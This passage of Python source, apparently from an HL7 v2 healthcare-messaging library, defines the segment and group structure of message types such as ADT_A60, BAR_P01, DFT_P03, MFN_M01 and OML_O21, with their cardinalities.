('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),)),
'ADT_A60': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('IAM', SEGMENTS['IAM'], (0, -1), 'SEG'),)),
'ADT_A61': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),)),
'BAR_P01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('BAR_P01_VISIT', GROUPS['BAR_P01_VISIT'], (1, -1), 'GRP'),)),
'BAR_P02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('BAR_P02_PATIENT', GROUPS['BAR_P02_PATIENT'], (1, -1), 'GRP'),)),
'BAR_P05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('BAR_P05_VISIT', GROUPS['BAR_P05_VISIT'], (1, -1), 'GRP'),)),
'BAR_P06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('BAR_P06_PATIENT', GROUPS['BAR_P06_PATIENT'], (1, -1), 'GRP'),)),
'BAR_P10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('GP1', SEGMENTS['GP1'], (1, 1), 'SEG'),
('BAR_P10_PROCEDURE', GROUPS['BAR_P10_PROCEDURE'], (0, -1), 'GRP'),)),
'BAR_P12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('BAR_P12_PROCEDURE', GROUPS['BAR_P12_PROCEDURE'], (0, -1), 'GRP'),)),
'BPS_O29': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BPS_O29_PATIENT', GROUPS['BPS_O29_PATIENT'], (0, 1), 'GRP'),
('BPS_O29_ORDER', GROUPS['BPS_O29_ORDER'], (1, -1), 'GRP'),)),
'BRP_O30': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BRP_O30_RESPONSE', GROUPS['BRP_O30_RESPONSE'], (0, 1), 'GRP'),)),
'BRT_O32': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BRT_O32_RESPONSE', GROUPS['BRT_O32_RESPONSE'], (0, 1), 'GRP'),)),
'BTS_O31': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('BTS_O31_PATIENT', GROUPS['BTS_O31_PATIENT'], (0, 1), 'GRP'),
('BTS_O31_ORDER', GROUPS['BTS_O31_ORDER'], (1, -1), 'GRP'),)),
'CRM_C01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('CRM_C01_PATIENT', GROUPS['CRM_C01_PATIENT'], (1, -1), 'GRP'),)),
'CSU_C09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('CSU_C09_PATIENT', GROUPS['CSU_C09_PATIENT'], (1, -1), 'GRP'),)),
'DFT_P03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('DFT_P03_COMMON_ORDER', GROUPS['DFT_P03_COMMON_ORDER'], (0, -1), 'GRP'),
('DFT_P03_FINANCIAL', GROUPS['DFT_P03_FINANCIAL'], (1, -1), 'GRP'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('DFT_P03_INSURANCE', GROUPS['DFT_P03_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),)),
'DFT_P11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('DFT_P11_COMMON_ORDER', GROUPS['DFT_P11_COMMON_ORDER'], (0, -1), 'GRP'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('DFT_P11_INSURANCE', GROUPS['DFT_P11_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DFT_P11_FINANCIAL', GROUPS['DFT_P11_FINANCIAL'], (1, -1), 'GRP'),)),
'DOC_T12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('DOC_T12_RESULT', GROUPS['DOC_T12_RESULT'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'DSR_Q01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'DSR_Q03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (0, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'EAC_U07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EAC_U07_COMMAND', GROUPS['EAC_U07_COMMAND'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'EAN_U09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EAN_U09_NOTIFICATION', GROUPS['EAN_U09_NOTIFICATION'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'EAR_U08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EAR_U08_COMMAND_RESPONSE', GROUPS['EAR_U08_COMMAND_RESPONSE'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'EDR_R07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'EQQ_Q04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQL', SEGMENTS['EQL'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ERP_R09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('ERQ', SEGMENTS['ERQ'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ESR_U02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'ESU_U01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('ISD', SEGMENTS['ISD'], (0, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'INR_U06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('INV', SEGMENTS['INV'], (1, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'INU_U05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('INV', SEGMENTS['INV'], (1, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'LSU_U12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('EQP', SEGMENTS['EQP'], (1, -1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'MDM_T01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('MDM_T01_COMMON_ORDER', GROUPS['MDM_T01_COMMON_ORDER'], (0, -1), 'GRP'),
('TXA', SEGMENTS['TXA'], (1, 1), 'SEG'),)),
'MDM_T02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('MDM_T02_COMMON_ORDER', GROUPS['MDM_T02_COMMON_ORDER'], (0, -1), 'GRP'),
('TXA', SEGMENTS['TXA'], (1, 1), 'SEG'),
('MDM_T02_OBSERVATION', GROUPS['MDM_T02_OBSERVATION'], (1, -1), 'GRP'),)),
'MFK_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFA', SEGMENTS['MFA'], (0, -1), 'SEG'),)),
'MFN_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M01_MF', GROUPS['MFN_M01_MF'], (1, -1), 'GRP'),)),
'MFN_M02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M02_MF_STAFF', GROUPS['MFN_M02_MF_STAFF'], (1, -1), 'GRP'),)),
'MFN_M03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M03_MF_TEST', GROUPS['MFN_M03_MF_TEST'], (1, -1), 'GRP'),)),
'MFN_M04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M04_MF_CDM', GROUPS['MFN_M04_MF_CDM'], (1, -1), 'GRP'),)),
'MFN_M05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M05_MF_LOCATION', GROUPS['MFN_M05_MF_LOCATION'], (1, -1), 'GRP'),)),
'MFN_M06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M06_MF_CLIN_STUDY', GROUPS['MFN_M06_MF_CLIN_STUDY'], (1, -1), 'GRP'),)),
'MFN_M07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M07_MF_CLIN_STUDY_SCHED', GROUPS['MFN_M07_MF_CLIN_STUDY_SCHED'], (1, -1), 'GRP'),)),
'MFN_M08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M08_MF_TEST_NUMERIC', GROUPS['MFN_M08_MF_TEST_NUMERIC'], (1, -1), 'GRP'),)),
'MFN_M09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M09_MF_TEST_CATEGORICAL', GROUPS['MFN_M09_MF_TEST_CATEGORICAL'], (1, -1), 'GRP'),)),
'MFN_M10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M10_MF_TEST_BATTERIES', GROUPS['MFN_M10_MF_TEST_BATTERIES'], (1, -1), 'GRP'),)),
'MFN_M11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M11_MF_TEST_CALCULATED', GROUPS['MFN_M11_MF_TEST_CALCULATED'], (1, -1), 'GRP'),)),
'MFN_M12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M12_MF_OBS_ATTRIBUTES', GROUPS['MFN_M12_MF_OBS_ATTRIBUTES'], (1, -1), 'GRP'),)),
'MFN_M13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFE', SEGMENTS['MFE'], (1, -1), 'SEG'),)),
'MFN_M15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M15_MF_INV_ITEM', GROUPS['MFN_M15_MF_INV_ITEM'], (1, -1), 'GRP'),)),
'MFN_Znn': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_ZNN_MF_SITE_DEFINED', GROUPS['MFN_ZNN_MF_SITE_DEFINED'], (1, -1), 'GRP'),)),
'MFQ_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M01_MF_QUERY', GROUPS['MFR_M01_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M04_MF_QUERY', GROUPS['MFR_M04_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M05_MF_QUERY', GROUPS['MFR_M05_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M06_MF_QUERY', GROUPS['MFR_M06_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M07_MF_QUERY', GROUPS['MFR_M07_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'NMD_N02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
(
'NMD_N02_CLOCK_AND_STATS_WITH_NOTES', GROUPS['NMD_N02_CLOCK_AND_STATS_WITH_NOTES'], (1, -1), 'GRP'),)),
'NMQ_N01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NMQ_N01_QRY_WITH_DETAIL', GROUPS['NMQ_N01_QRY_WITH_DETAIL'], (0, 1), 'GRP'),
('NMQ_N01_CLOCK_AND_STATISTICS', GROUPS['NMQ_N01_CLOCK_AND_STATISTICS'], (1, -1), 'GRP'),)),
'NMR_N01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (0, 1), 'SEG'),
('NMR_N01_CLOCK_AND_STATS_WITH_NOTES_ALT', GROUPS['NMR_N01_CLOCK_AND_STATS_WITH_NOTES_ALT'], (1, -1),
'GRP'),)),
'OMB_O27': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMB_O27_PATIENT', GROUPS['OMB_O27_PATIENT'], (0, 1), 'GRP'),
('OMB_O27_ORDER', GROUPS['OMB_O27_ORDER'], (1, -1), 'GRP'),)),
'OMD_O03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMD_O03_PATIENT', GROUPS['OMD_O03_PATIENT'], (0, 1), 'GRP'),
('OMD_O03_ORDER_DIET', GROUPS['OMD_O03_ORDER_DIET'], (1, -1), 'GRP'),
('OMD_O03_ORDER_TRAY', GROUPS['OMD_O03_ORDER_TRAY'], (0, -1), 'GRP'),)),
'OMG_O19': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMG_O19_PATIENT', GROUPS['OMG_O19_PATIENT'], (0, 1), 'GRP'),
('OMG_O19_ORDER', GROUPS['OMG_O19_ORDER'], (1, -1), 'GRP'),)),
'OMI_O23': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMI_O23_PATIENT', GROUPS['OMI_O23_PATIENT'], (0, 1), 'GRP'),
('OMI_O23_ORDER', GROUPS['OMI_O23_ORDER'], (1, -1), 'GRP'),)),
'OML_O21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OML_O21_PATIENT', GROUPS['OML_O21_PATIENT'], (0, 1), 'GRP'),
('OML_O21_ORDER', GROUPS['OML_O21_ORDER'], (1, -1), 'GRP'),)),
'OML_O33': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OML_O33_PATIENT', GROUPS['OML_O33_PATIENT'], (0, 1), 'GRP'),
('OML_O33_SPECIMEN', GROUPS['OML_O33_SPECIMEN'], (1, -1), 'GRP'),)),
'OML_O35': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OML_O35_PATIENT', GROUPS['OML_O35_PATIENT'], (0, 1), 'GRP'),
('OML_O35_SPECIMEN', GROUPS['OML_O35_SPECIMEN'], (1, -1), 'GRP'),)),
'OMN_O07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
